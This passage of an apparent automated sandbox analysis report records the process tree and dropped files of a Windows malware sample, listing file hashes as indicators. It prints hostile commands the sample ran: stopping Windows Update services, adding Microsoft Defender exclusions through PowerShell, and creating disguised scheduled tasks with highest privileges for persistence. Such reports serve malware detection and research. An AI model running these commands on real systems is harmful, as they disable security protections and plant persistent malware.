                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                PID:8764
                                                                                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                sc stop WaaSMedicSvc
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                PID:8748
                                                                                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                sc stop wuauserv
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                PID:8728
                                                                                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                sc stop bits
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                PID:8804
                                                                                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                sc stop dosvc
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                PID:8824
                                                                                                                                                                                                            • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                              C:\Windows\System32\dialer.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:8852
                                                                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                              C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:8860
                                                                                                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:8948
                                                                                                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:9028
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  PID:6540
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:6544
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:6104
                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5992
                                                                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                          sc stop UsoSvc
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:6100
                                                                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                          sc stop WaaSMedicSvc
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                          sc stop wuauserv
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:5756
                                                                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                          sc stop bits
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:5912
                                                                                                                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                          sc stop dosvc
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:5844
                                                                                                                                                                                                                      • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                                        C:\Windows\System32\dialer.exe
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5880
                                                                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                          C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                          PID:5760
                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5680
                                                                                                                                                                                                                          • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                                            C:\Windows\System32\dialer.exe
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3028
                                                                                                                                                                                                                            • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                                              C:\Windows\System32\dialer.exe
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3040
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3568
                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3752
                                                                                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:3908
                                                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4144
                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:1600
                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:3304
                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                          PID:4180
                                                                                                                                                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1676
                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1988
                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4912
                                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:3808
                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:1072
                                                                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:3424
                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:3168
                                                                                                                                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                        PID:2128
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:7748
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:7732
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:7712
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:7308
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:7236
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:7208
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Windows\TAPI\System.exe'" /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:3212
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:8492
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:8440
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Links\SppExtComObj.exe'" /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:8368
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Default\Links\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:8344
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Links\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:8328
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\ShellExperiences\csrss.exe'" /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:8300
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:8272
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellExperiences\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                          PID:8256
                                                                                                                                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5348
                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                          PID:1132
                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 500 -p 2784 -ip 2784
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                            PID:6764
                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 504 -p 4860 -ip 4860
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:5088

                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\based.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            7.2MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            737e5fb841afabac0d62f70a50d74ac5

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            274daac4ab707af2d3e74f76a8f567f911d4ab32

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            24446412defb440185152f5524435d56f4316eae4e691c5468154feecb795da6

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            5d03d4f2a8f33f1abf232c8a0ca66f270dedccc8f765b20d768cf8e6e5a2c7ab851de931ee5674cb5a4d011084c916e1a0985c278e30b67da5a118d1ad43c925

                                                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\hacn.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            27.3MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            b88f1340f5934f4e81a06b322cecae5c

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            6b6d63fec4546ecde4eee6e710f0845fd84a19cf

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            1f0a70334fb3a63b9c70cdfe01c012829cc380970cd6b12936f22d44e3c0e388

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            80135012e70e24ba2aace76661900d95a2dceea2d5ecc184f7632df90f2b9153413806af9c2db2955abb852d908af34fc1a0f79c3ed2bcc09a17bbf79a86065c

                                                                                                                                                                                                                                                          • C:\ProgramData\crss.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            12.9MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            af7c523acfdfc98b945b8092170a5fd3

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            cc8131cdbaeceaa28a757f8289077d3214938176

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            cd4ebc4942faf22d6b41d8d0d41aad0570807e7dc484f35010a903caa5a1adb7

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            3dd365665594fddb3e64e3ef3af25ae858538522f2ca61706d0708ca927230f54da23088e578b3ccc11c3f10a8498647b1d701769944fdd17690d2f239777acf

                                                                                                                                                                                                                                                          • C:\ProgramData\main.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            3d3c49dd5d13a242b436e0a065cd6837

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            e38a773ffa08452c449ca5a880d89cfad24b6f1b

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00

                                                                                                                                                                                                                                                          • C:\ProgramData\setup.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            5.4MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            1274cbcd6329098f79a3be6d76ab8b97

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            53c870d62dcd6154052445dc03888cdc6cffd370

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

                                                                                                                                                                                                                                                          • C:\ProgramData\svchost.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            3.9MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            45c59202dce8ed255b4dbd8ba74c630f

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            60872781ed51d9bc22a36943da5f7be42c304130

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            d07c47f759245d34a5b94786637c3d2424c7e3f3dea3d738d95bf4721dbf3b16

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            fff5b16ae38681ed56782c0f0423560dab45065685d7272424206f43c80486318180aa22d66bd197c8c530e4c24dbaaaa020beb76b619dc767ee59faa27e23ed

                                                                                                                                                                                                                                                          • C:\ProgramData\шева.txt

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            14B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            2c807857a435aa8554d595bd14ed35d1

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            9003a73beceab3d1b1cd65614347c33117041a95

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9

                                                                                                                                                                                                                                                          • C:\Recovery\WindowsRE\TextInputHost.exe

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            3.5MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5fe249bbcc644c6f155d86e8b3cc1e12

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            f5c550ab2576d2daeff9cb72a4d41d1bcfee0e6d

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            9308b0ce7206c60517db7207c488b4fa1cc313413e5378d8bac63b22cabcdd80

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            b210c6b5d8db31d8f4ea82a79fe4679ced289636570e3fd72a45c488fd2cd75ed74677d723c1bfa67432e46e71901cb6551595e1053448c2f5e297829a6e1b39

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI24322\_bz2.pyd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            81KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            86d1b2a9070cd7d52124126a357ff067

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            18e30446fe51ced706f62c3544a8c8fdc08de503

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            62173a8fadd4bf4dd71ab89ea718754aa31620244372f0c5bbbae102e641a60e

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            7db4b7e0c518a02ae901f4b24e3860122acc67e38e73f98f993fe99eb20bb3aa539db1ed40e63d6021861b54f34a5f5a364907ffd7da182adea68bbdd5c2b535

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI24322\_decimal.pyd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            248KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            20c77203ddf9ff2ff96d6d11dea2edcf

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            0d660b8d1161e72c993c6e2ab0292a409f6379a5

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            9aac010a424c757c434c460c3c0a6515d7720966ab64bad667539282a17b4133

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            2b24346ece2cbd1e9472a0e70768a8b4a5d2c12b3d83934f22ebdc9392d9023dcb44d2322ada9edbe2eb0e2c01b5742d2a83fa57ca23054080909ec6eb7cf3ca

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI24322\_hashlib.pyd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            63KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d4674750c732f0db4c4dd6a83a9124fe

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            fd8d76817abc847bb8359a7c268acada9d26bfd5

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            caa4d2f8795e9a55e128409cc016e2cc5c694cb026d7058fc561e4dd131ed1c9

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            97d57cfb80dd9dd822f2f30f836e13a52f771ee8485bc0fd29236882970f6bfbdfaac3f2e333bba5c25c20255e8c0f5ad82d8bc8a6b6e2f7a07ea94a9149c81e

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI24322\_lzma.pyd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            154KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            7447efd8d71e8a1929be0fac722b42dc

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            6080c1b84c2dcbf03dcc2d95306615ff5fce49a6

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            60793c8592193cfbd00fd3e5263be4315d650ba4f9e4fda9c45a10642fd998be

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c6295d45ed6c4f7534c1a38d47ddc55fea8b9f62bbdc0743e4d22e8ad0484984f8ab077b73e683d0a92d11bf6588a1ae395456cfa57da94bb2a6c4a1b07984de

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI24322\_socket.pyd

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            77KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            819166054fec07efcd1062f13c2147ee

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            93868ebcd6e013fda9cd96d8065a1d70a66a2a26

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            e6deb751039cd5424a139708475ce83f9c042d43e650765a716cb4a924b07e4f

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            da3a440c94cb99b8af7d2bc8f8f0631ae9c112bd04badf200edbf7ea0c48d012843b4a9fb9f1e6d3a9674fd3d4eb6f0fa78fd1121fad1f01f3b981028538b666

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI24322\base_library.zip

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            859KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            c4989bceb9e7e83078812c9532baeea7

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            aafb66ebdb5edc327d7cb6632eb80742be1ad2eb

                                                                                                                                                                                                                                                            SHA256

